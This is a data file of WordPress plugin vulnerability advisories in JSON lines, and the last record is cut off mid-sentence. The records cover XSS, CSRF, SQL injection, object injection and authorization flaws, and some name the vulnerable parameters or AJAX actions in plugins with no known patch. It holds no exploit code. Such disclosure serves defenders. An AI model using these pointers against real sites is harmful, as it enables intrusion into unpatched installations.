{"CVE_ID":"CVE-2024-13899","slug":"mambo-joomla-importer","versionImpact":"1.0","description":"The Mambo Importer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0 via deserialization of untrusted input via the $data parameter in the fImportMenu function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mambo-joomla-importer\\\/trunk\\\/mamboImporter.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mambo-joomla-importer\\\/trunk\\\/mamboImporter.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6d448c2-5acc-47f8-8e86-9ef10fa01513?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6d448c2-5acc-47f8-8e86-9ef10fa01513?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2935","slug":"stop-spammer-registrations-plugin","versionImpact":"2024.7","description":"The Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2024.7. This is due to missing or incorrect nonce validation in the 'ss_option_maint.php' and 'ss_user_filter_list' files. This makes it possible for unauthenticated attackers to delete pending comments, and re-enable a previously blocked user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_option_maint.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_option_maint.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L239\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L239\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stop-spammer-registrations-plugin\\\/trunk\\\/settings\\\/ss_user_filter_list.php#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aefb192a-ed42-44a9-bbd1-5906909a419c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aefb192a-ed42-44a9-bbd1-5906909a419c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4622","slug":"baw-login-logout-menu","versionImpact":"1.3.3","description":"The Login Logout Menu WordPress plugin through 1.3.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea055ed4-324d-4d77-826a-b6f814413eb2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea055ed4-324d-4d77-826a-b6f814413eb2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4368","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Authenticated Settings Change in versions up to, and including, 18.2. This is due to lacking capability checks and a security nonce, all on the wpfm_save_settings AJAX action. This makes it possible for subscriber-level attackers to edit the plugin settings, such as the allowed upload file types.  This can lead to remote code execution through other vulnerabilities.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2554359%40nmedia-user-file-uploader&new=2554359%40nmedia-user-file-uploader&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adb1d8b0-b1d6-40df-b591-f1062ee744fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adb1d8b0-b1d6-40df-b591-f1062ee744fb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1419","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.4.0","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 attribute of the Header Meta Content widget in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b3d83b-9695-40c5-b6ee-2a76c940de6e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043999\\\/the-plus-addons-for-elementor-page-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043999\\\/the-plus-addons-for-elementor-page-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4534","slug":"kkprogressbar","versionImpact":"1.1.4.2","description":"The KKProgressbar2 Free  WordPress plugin through 1.1.4.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b0046d4-cf95-4307-95a5-9b823f2daaaa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b0046d4-cf95-4307-95a5-9b823f2daaaa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8713","slug":"kodex-posts-likes","versionImpact":"2.5.0","description":"The Kodex Posts likes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44780988-cadf-4ff2-9ba9-148b7b6650df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44780988-cadf-4ff2-9ba9-148b7b6650df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kodex-posts-likes\\\/trunk\\\/admin\\\/partials\\\/settings.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kodex-posts-likes\\\/trunk\\\/admin\\\/partials\\\/settings.php#L14\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11451","slug":"zooom","versionImpact":"1.1.0","description":"The Zooom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zooom' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zooom\\\/trunk\\\/zooom.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zooom\\\/trunk\\\/zooom.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zooom\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zooom\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bd15878-a290-4613-83d9-011d60bb0233?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bd15878-a290-4613-83d9-011d60bb0233?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-55998","slug":"popup-surveys","versionImpact":"1.36","description":"Missing Authorization vulnerability in dusthazard Popup Surveys & Polls for WordPress (Mare.io) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Surveys & Polls for WordPress (Mare.io): from n\/a through 1.36.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/popup-surveys\\\/vulnerability\\\/wordpress-popup-surveys-polls-for-wordpress-mare-io-plugin-1-36-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/popup-surveys\\\/vulnerability\\\/wordpress-popup-surveys-polls-for-wordpress-mare-io-plugin-1-36-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13850","slug":"simple-add-pages-or-posts","versionImpact":"2.0.0","description":"The Simple add pages or posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-add-pages-or-posts\\\/tags\\\/2.0.0\\\/form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-add-pages-or-posts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65a3604d-eb6b-484f-834a-b3d75fe3bda7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65a3604d-eb6b-484f-834a-b3d75fe3bda7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1382","slug":"contact-us-by-lord-linus","versionImpact":"2.6","description":"The Contact Us By Lord Linus WordPress plugin through 2.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3002265-ac83-4c00-8afb-cbfbb4afc1e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3002265-ac83-4c00-8afb-cbfbb4afc1e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31616","slug":"varnish-wp","versionImpact":"1.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in AdminGeekZ Varnish WordPress allows Cross Site Request Forgery. This issue affects Varnish WordPress: from n\/a through 1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/varnish-wp\\\/vulnerability\\\/wordpress-varnish-wordpress-plugin-1-7-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/varnish-wp\\\/vulnerability\\\/wordpress-varnish-wordpress-plugin-1-7-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4386","slug":"intuitive-custom-post-order","versionImpact":"3.1.3","description":"The Intuitive Custom Post Order WordPress plugin through 3.1.3 lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/734064e3-afe9-4dfd-8d76-8a757cc94815\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/734064e3-afe9-4dfd-8d76-8a757cc94815\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4367","slug":"flo-forms","versionImpact":"1.0.35","description":"The Flo Forms \u2013 Easy Drag & Drop Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Options Change by using the flo_import_forms_options AJAX action in versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping along with missing capability checks. This makes it possible for authenticated attackers, like subscribers, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4a83501-c727-4c9b-a9a1-46b399ab0caa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4a83501-c727-4c9b-a9a1-46b399ab0caa\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a175e103-ab89-404b-8736-94d0d93d6cf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a175e103-ab89-404b-8736-94d0d93d6cf3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flo-forms-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flo-forms-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4405","slug":"elasticpress","versionImpact":"3.5.3","description":"The ElasticPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.3. This is due to missing or incorrect nonce validation on the epio_send_autosuggest_allowed() function. This makes it possible for unauthenticated attackers to send allowed parameters for autosuggest to elasticpress[.]io via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473455\\\/elasticpress\\\/trunk\\\/includes\\\/classes\\\/Feature\\\/Autosuggest\\\/Autosuggest.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473455\\\/elasticpress\\\/trunk\\\/includes\\\/classes\\\/Feature\\\/Autosuggest\\\/Autosuggest.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ab8eb9d-1427-4e99-8986-179147e0862e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ab8eb9d-1427-4e99-8986-179147e0862e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1720","slug":"user-registration","versionImpact":"3.1.4","description":"The User Registration \u2013 Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62b809dc-4089-4822-8aeb-7049fcfe376e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php#L288\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php#L288\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045419\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045419\\\/user-registration\\\/trunk\\\/includes\\\/class-ur-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-28850","slug":"wp-crontrol","description":"WP Crontrol controls the cron events on WordPress websites.  WP Crontrol includes a feature that allows administrative users to create events in the WP-Cron system that store and execute PHP code subject to the restrictive security permissions documented here. While there is no known vulnerability in this feature on its own, there exists potential for this feature to be vulnerable to RCE if it were specifically targeted via vulnerability chaining that exploited a separate SQLi (or similar) vulnerability. This is exploitable on a site if one of the below preconditions are met, the site is vulnerable to a writeable SQLi vulnerability in any plugin, theme, or WordPress core, the site's database is compromised at the hosting level, the site is vulnerable to a method of updating arbitrary options in the wp_options table, or the site is vulnerable to a method of triggering an arbitrary action, filter, or function with control of the parameters.  As a hardening measure, WP Crontrol version 1.16.2 ships with a new feature that prevents tampering of the code stored in a PHP cron event.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/security\\\/advisories\\\/GHSA-9xvf-cjvf-ff5q\",\"name\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/security\\\/advisories\\\/GHSA-9xvf-cjvf-ff5q\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/releases\\\/tag\\\/1.16.2\",\"name\":\"https:\\\/\\\/github.com\\\/johnbillion\\\/wp-crontrol\\\/releases\\\/tag\\\/1.16.2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4533","slug":"kkprogressbar","versionImpact":"1.1.4.2","description":"The KKProgressbar2 Free  WordPress plugin through 1.1.4.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admin users to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3406236-aaee-480a-8931-79c867252f11\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3406236-aaee-480a-8931-79c867252f11\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54391","slug":"wordpress-filter","versionImpact":"1.4.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Matt Walters WordPress Filter allows Stored XSS.This issue affects WordPress Filter: from n\/a through 1.4.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-filter\\\/vulnerability\\\/wordpress-wordpress-filter-plugin-1-4-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-filter\\\/vulnerability\\\/wordpress-wordpress-filter-plugin-1-4-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10222","slug":"svg-support","versionImpact":"2.5.10","description":"The SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.5.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. By default, this can only be exploited by administrators, but the ability to upload SVG files can be extended to authors.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/benbodhi\\\/svg-support\\\/commit\\\/eee3e13b650511c9cc9ee0746be485d031c7c072\",\"name\":\"https:\\\/\\\/github.com\\\/benbodhi\\\/svg-support\\\/commit\\\/eee3e13b650511c9cc9ee0746be485d031c7c072\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244181\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244181\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5852f08d-0506-464e-afd1-c625e4034e1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5852f08d-0506-464e-afd1-c625e4034e1d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1363","slug":"easy-broken-link-checker","versionImpact":"9.0.2","description":"The URL Shortener | Conversion Tracking  | AB Testing  | WooCommerce WordPress plugin through 9.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16b08e77-3562-4506-9b28-abd1b1128b0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16b08e77-3562-4506-9b28-abd1b1128b0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31597","slug":"ultimate-live-cricket-lite","versionImpact":"1.4.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in crazycric Ultimate Live Cricket WordPress Lite allows Stored XSS. This issue affects Ultimate Live Cricket WordPress Lite: from n\/a through 1.4.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ultimate-live-cricket-lite\\\/vulnerability\\\/wordpress-ultimate-live-cricket-wordpress-lite-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/ultimate-live-cricket-lite\\\/vulnerability\\\/wordpress-ultimate-live-cricket-wordpress-lite-plugin-1-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4385","slug":"intuitive-custom-post-order","versionImpact":"3.1.3","description":"The Intuitive Custom Post Order WordPress plugin through 3.1.3 does not check for authorization in the update-menu-order ajax action, allowing any logged in user (with roles as low as Subscriber) to update the menu order","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f900d37-6eee-4434-8b9b-d10cc4a9167c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f900d37-6eee-4434-8b9b-d10cc4a9167c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4366","slug":"pwa-for-wp","versionImpact":"1.7.32","description":"The PWA for WP & AMP plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the  pwaforwp_update_features_options function in versions up to, and including, 1.7.32. This makes it possible for authenticated attackers to change the otherwise restricted settings within the 